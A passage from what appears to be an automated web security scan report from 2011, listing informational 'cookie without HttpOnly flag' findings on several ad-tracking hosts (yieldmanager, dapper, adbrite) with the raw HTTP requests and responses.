:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#c?c!!!!#<xjv_!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!#<xjv_!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!#<xjv_!#tM)!!!!#<xjv_!#tn2!!!!#<xjv_!#uE=!!!!#<x9#K!#uJY!!!!*<xjv_!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#vyX!!!!#<xjv_!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!'<xjv_!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#R7!!!!#<xjv_!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$'Z-!!!!#<xjv_!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!'<xjv_!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; path=/; expires=Tue, 30-Apr-2013 23:34:03 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://ads.bluelithium.com/pixel?id=726973&t=2
Age: 0
Proxy-Connection: close

Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:34:03 GMT
Pragma: no-cache
Content-Length: 0
Connection: close


17.58. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=199372&data=218002&id=901810&data=218002&t=2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.yieldmanager.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:06:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!$!!?VS!!B1c<xl6-!#KjQ!!B1c<xl6-"; path=/; expires=Wed, 01-May-2013 02:06:15 GMT
Set-Cookie: uid=uid=c286e09c-7460-11e0-b60b-001e6849f2eb&_hmacv=1&_salt=711792197&_keyid=k1&_hmac=03896a371f2e7062566c514fc169bb48f8cbb4ae; path=/; expires=Wed, 01-Jun-2011 02:06:15 GMT
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:06:15 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

17.59. http://ad.yieldmanager.com/unpixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=755565 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!3!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!#<xjv@!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; pv1="b!!!!%!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjv@<y+o:M.jTN!!L7_!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjv@<yi]YM.jTN"; bh="b!!!$U!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0O4!!!!#<xjv?!!0O<!!!!$<xjv?!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!*<xjv?!!J<E!!!!*<xjv?!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!+<xjv?!!q:E!!!!(<xjv?!!q<+!!!!)<xjv?!!q</!!!!)<xjv?!!q<3!!!!)<xjv?!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<xjv?!!tjQ!!!!$<xG3/!!ucq!!!!$<xjv?!!vRm!!!!#<xjv?!!vRq!!!!#<xjv?!!vRr!!!!#<xjv?!!vRw!!!!$<xjv?!!vRx!!!!#<xjv?!!vRy!!!!#<xjv?!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!#<xjv?!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!#<xjvJ!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!#<xjv?!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!#<xjv?!#6U!!!!!#<x,:<!#7.'!!!!#<xjv?!#7.:!!!!#<xjv?!#7.O!!!!#<xjv?!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#L]q!!!!#<w>/s!#MHv!!!
!$<w>/n!#MTC!!!!#<xjv?!#MTF!!!!#<xjv?!#MTH!!!!#<xjv?!#MTI!!!!#<xjv?!#MTJ!!!!#<xjv?!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!*<xjv?!#SF3!!!!*<xjv?!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!#<xjv?!#UDP!!!!*<xjv?!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#ah!!!!!#<xjv?!#ai7!!!!#<xjv?!#ai?!!!!#<xjv?!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#c?c!!!!#<xjv?!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#f26!!!!#<xl.y!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!#<xjv?!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!#<xjv?!#tM)!!!!#<xjv?!#tn2!!!!#<xjv?!#uE=!!!!#<x9#K!#uJY!!!!*<xjv?!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#vyX!!!!#<xjv?!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!'<xjv?!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#R7!!!!#<xjv?!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$'Z-!!!!#<xjv?!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!'<xjv?!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:06:31 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$U!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0O4!!!!#<xjv?!!0O<!!!!$<xjv?!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!*<xjv?!!J<E!!!!*<xjv?!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!+<xjv?!!q:E!!!!(<xjv?!!q<+!!!!)<xjv?!!q</!!!!)<xjv?!!q<3!!!!)<xjv?!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<xjv?!!tjQ!!!!$<xG3/!!ucq!!!!$<xjv?!!vRm!!!!#<xjv?!!vRq!!!!#<xjv?!!vRr!!!!#<xjv?!!vRw!!!!$<xjv?!!vRx!!!!#<xjv?!!vRy!!!!#<xjv?!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!#<xjv?!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!#<xjvJ!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!#<xjv?!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!#<xjv?!#6U!~~!#7.'!!!!#<xjv?!#7.:!!!!#<xjv?!#7.O!!!!#<xjv?!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!#<xjv?!#MTF!!!!#<xjv?!#MTH!!!!#<xjv?!#MTI!!!!#<xjv?!#MTJ!!!!#<xjv?!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!*<xjv?!#SF3!!!!*<xjv?!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!#<xjv?!#UDP!!!!*<xjv?!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#ah!!!!!#<xjv?!#ai7!!!!#<xjv?!#ai?!!!!#<xjv?!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!
!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#c?c!!!!#<xjv?!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#f26!!!!#<xl.y!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!#<xjv?!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!#<xjv?!#tM)!!!!#<xjv?!#tn2!!!!#<xjv?!#uE=!!!!#<x9#K!#uJY!!!!*<xjv?!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#vyX!!!!#<xjv?!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!'<xjv?!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#R7!!!!#<xjv?!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$'Z-!!!!#<xjv?!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!'<xjv?!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; path=/; expires=Wed, 01-May-2013 02:06:31 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:06:31 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

17.60. http://admonkey.dapper.net/AdBriteUIDMonster

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /AdBriteUIDMonster

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdBriteUIDMonster?redirect=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F779045%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: admonkey.dapper.net

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.64
Date: Mon, 02 May 2011 02:35:21 GMT
Connection: keep-alive
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: uid=17610414499975294; Expires=Sat, 29-Oct-2011 02:35:21 GMT
Location: http://ads.adbrite.com/adserver/vdi/779045?d=17610414499975294
Content-Length: 0


17.61. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.62. http://ads.adbrite.com/adserver/behavioral-data/8204

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/behavioral-data/8204?d=1000,2,3,4,500,93 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRjdreS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq00"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:39:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3Abc9BDoMgEAXQu8zaBWDRxNtQhYrUoRW1NeLdK8UmJHX7%2Fp%2BfzAozg2oFI5eXHRoHFTiTjw9Pn%2FdWvT31xF96S0jmOlbmKVM12Z21xoOXyJ3Z23WL3DA%2B3kKkpyJEP9Q8RSdYI%2BKAjANh9qgqe3Kv%2BjPEfyzKOkHI4CoQ5aC%2Fb8K2fQA%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:39:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.63. http://ads.adbrite.com/adserver/vdi/682865

Summary

Severity:   Information
Confidence:   Certain
